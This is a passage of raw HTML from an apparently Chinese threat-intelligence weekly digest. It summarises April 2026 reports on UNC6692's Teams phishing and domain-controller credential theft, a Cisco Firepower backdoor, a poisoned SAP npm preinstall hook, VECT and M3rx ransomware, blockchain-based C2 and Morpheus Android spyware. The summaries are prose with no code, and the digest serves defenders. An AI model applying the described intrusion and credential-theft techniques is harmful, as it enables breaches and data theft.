0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">UNC6692 利用社会工程学部署定制恶意软件套件</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月24日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://cloud.google.com/blog/topics/threat-intelligence/unc6692-social-engineering-custom-malware/" target="_blank">https://cloud.google.com/blog/topics/threat-intelligence/unc6692-social-engineering-custom-malware/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">UNC6692组织通过冒充IT服务台在Microsoft Teams发送钓鱼链接，诱导受害者下载AutoHotKey脚本安装SNOWBELT浏览器扩展，进而部署SNOWGLAZE隧道和SNOWBASIN后门，执行内网扫描、凭据窃取（LSASS转储）、传递哈希横向移动至域控制器，最终使用FTK Imager提取NTDS.dit并外传，同时利用钓鱼页面骗取用户凭证。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100034931" data-ratio="0.5006150061500615" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="813" src="https://wechat2rss.xlab.app/img-proxy/?k=c7285719&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOqibc5k6iaepwxMgH7EONibqS3pvicUKGKy2yRtPeaDtXWeAk8SXPN1Pd4ALibGhFQNmIExBGxVJMklUDXbQeEiaXGL7gwp5zGwoDsnUk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">04</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">UAT-4356 针对 Cisco Firepower 设备的目标</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月23日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://blog.talosintelligence.com/uat-4356-firestarter/" target="_blank">https://blog.talosintelligence.com/uat-4356-firestarter/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">UAT-4356利用CVE-2025-20333和CVE-2025-20362漏洞针对Cisco Firepower设备的FXOS系统，植入FIRESTARTER后门；该后门通过修改CSP_MOUNT_LIST实现瞬态持久化（仅限软重启），注入LINA进程并替换WebVPN XML处理函数，解析特定前缀后执行任意shellcode，其技术能力与Rayliniator的第三阶段载荷高度重叠。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">05</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">供应链攻击永无眠：SAP CAP &amp; Cloud MTA npm 供应链攻击事件报告</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月29日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://mp.weixin.qq.com/s/gaeeRzgxg-E_9G6_vtfO_g" target="_blank">https://mp.weixin.qq.com/s/gaeeRzgxg-E_9G6_vtfO_g</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者通过污染SAP CAP生态中的四个npm官方包（如@cap-js/sqlite等），在安装时利用preinstall钩子从GitHub下载Bun运行时执行高度混淆的execution.js，该载荷会窃取GitHub、npm、AWS、Azure、Kubernetes等凭证并通过GitHub提交伪装外传，同时修改包文件实现自传播，影响开发者本地环境和CI/CD流水线，此次攻击与Shai-Hulud活动手法一致。</span></p></div><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: 10px 0% 20px;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: stretch;padding: 0px 10px;border-style: solid;border-width: 0px;border-color: rgb(62, 62, 62);box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 0px 0% -9px;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0%;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034933" src="https://wechat2rss.xlab.app/img-proxy/?k=2479b5c7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqicXA0SOz3NA78TRyPyJiaBBWtdVmrByUDWiawTFgM0QIXQxX5WyZEg3DmexzPzkgVEk9RFd3QIdketvlLtZjBOvCgdQ5wSXlBTWU%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034934" src="https://wechat2rss.xlab.app/img-proxy/?k=65672314&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqicCLgwkNGOYMSc0vqHm5yEfjbw8N7HhsSv9atPEmRSe0KjaOLtgUke9Wvn5QFtIWkfnFs5urj5F0Iq1et7P7Tx5oHBP2bVv6DE%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0%;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;flex: 100 100 0%;align-self: flex-start;height: auto;z-index: 2;margin: 0px;padding: 3px 6px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(55, 113, 187);line-height: 1.8;letter-spacing: 1.8px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">恶意代码情报</span></strong></p></div></div></div><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: -10px 0% 0px;transform: rotateX(180deg);-webkit-transform: rotateX(180deg);-moz-transform: rotateX(180deg);-o-transform: rotateX(180deg);justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0% 1px;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034932" src="https://wechat2rss.xlab.app/img-proxy/?k=922dadc1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq9q3N1TJcPZ5G7bAjicRolFY1tYrHiafFQ7Cow5047T2FmLUXWLzdZynhyzpNMRYuZxlDZChRCmF3Wr8yicuBDdtfy8XmYTI9UpKo%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034930" src="https://wechat2rss.xlab.app/img-proxy/?k=e5da79f2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq8Ixhibsg5wbIoahGlH1oY3XPHNAE3VcgmkdaWGofmYnzSqIl6scQLvtg4gibVpuTGTrwu41YVBqQKDzCibOyl7osB1oxzUKnn4Mw%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">01</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">VECT：设计为勒索软件，意外成为数据擦除器</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月28日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://research.checkpoint.com/2026/vect-ransomware-by-design-wiper-by-accident/" target="_blank">https://research.checkpoint.com/2026/vect-ransomware-by-design-wiper-by-accident/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Check Point Research对2025年12月出现的RaaS（勒索软件即服务）项目VECT 2.0进行深度技术分析，发现其存在一个致命的加密实现缺陷，使其从设计上的勒索软件意外成为数据擦除器。该软件基于libsodium库使用ChaCha20-IETF流密码（而非其广告宣称的ChaCha20-Poly1305 AEAD），针对Windows、Linux和ESXi三个平台采用统一的代码库。当处理大于131,072字节（128KB）的文件时，VECT将文件分为四个区块进行加密，每个区块生成一个独立的12字节随机nonce，但所有nonce被写入同一个共享缓冲区，导致前三个nonce在循环中被覆盖，最终仅第四个nonce被保存到文件末尾。由于ChaCha20-IETF解密需要精确的nonce匹配，这意味着任何大于128KB的文件中，前三个四分之一的区块数据永久不可恢复，包括VM磁盘、数据库、文档和备份等企业关键资产。该缺陷存在于所有公开可用的VECT版本中，且早于2.0版本就已存在。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">02</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M3rx勒索软件：揭秘新型泄露网站攻击者和Go加密器</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月27日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.derp.ca/research/m3rx-ransomware-go-encryptor/" target="_blank">https://www.derp.ca/research/m3rx-ransomware-go-encryptor/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">M3rx是一个新兴的勒索软件团伙，拥有泄密网站和Tox联系方式，其Windows加密器使用Go编写，通过X25519密钥交换和AES-CTR加密文件内容，每文件AES密钥经AES-GCM包装后存入0x400字节的尾注中，默认仅加密文件1%的内容（可配置），加密后文件重命名为随机16字符并添加.8hmlsewu扩展名，释放RECOVERY_NOTES.TXT赎金票据，清空回收站并在执行后通过PowerShell自删除。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">03</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">TryNodeUpdate 将 GitHub 和 BSC 转换为 TCP 控制通道</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月24日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.derp.ca/research/trynodeupdate-github-node-bsc-contract-c2/" target="_blank">https://www.derp.ca/research/trynodeupdate-github-node-bsc-contract-c2/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">TryNodeUpdate是一个Windows恶意软件链，通过PowerShell从GitHub获取Node.js控制器，控制器调用BNB智能合约解析出TCP后端地址，连接后下载本地辅助程序rpc.exe；该辅助程序同样通过合约获取后端，建立原始TCP控制通道（JSON格式新行分隔），支持心跳、文件上传和执行完整JS载荷。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">04</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Morpheus：一款与IPS Intelligence有关的新型间谍软件</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月23日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://osservatorionessuno.org/blog/2026/04/morpheus-a-new-spyware-linked-to-ips-intelligence/" target="_blank">https://osservatorionessuno.org/blog/2026/04/morpheus-a-new-spyware-linked-to-ips-intelligence/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Morpheus是一款可能由意大利开发的Android间谍软件，通过伪装成Fastweb ISP的钓鱼短信诱导安装，利用无障碍服务和ADB自动授权、禁用摄像头/麦克风指示灯、绕过生物识别添加WhatsApp配对设备，并具备录屏、录音及执行系统命令等能力；其部分基础设施关联IPS Intelligence及Rever Servicenet、Iris Telecomunicazioni等公司。</span></p></div><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: 10px 0% 20px;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: stretch;padding: 0px 10px;border-style: solid;border-width: 0px;border-color: rgb(62, 62, 62);box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 0px 0% -9px;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0%;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034937" src="https://wechat2rss.xlab.app/img-proxy/?k=ee095539&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqibqFkZshTLgzlkc08ibibO2ppEtocsAF73ibH5K7ttNVXUPzapuyah3PEgx19ZXO91SUJLnIg77ibJHDSanlAmArevPg6vf1YOKyBg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034935" src="https://wechat2rss.xlab.app/img-proxy/?k=498d7b6b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqibgghKdQeLfHa2VlKDYsfEUYia9YuSXYicUoAftLy01jLjnKa045ESKLJUyDBQLypOMw1iblUxJ8icKG7BGN7uhFmOEUZPMt9wtia94%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0%;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;flex: 100 100 0%;align-self: flex-start;height: auto;z-index: 2;margin: 0px;padding: 3px 6px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(55, 113, 187);line-height: 1.8;letter-spacing: 1.8px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞情报</span></strong></p></div></div></div><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="display: flex;flex-flow: 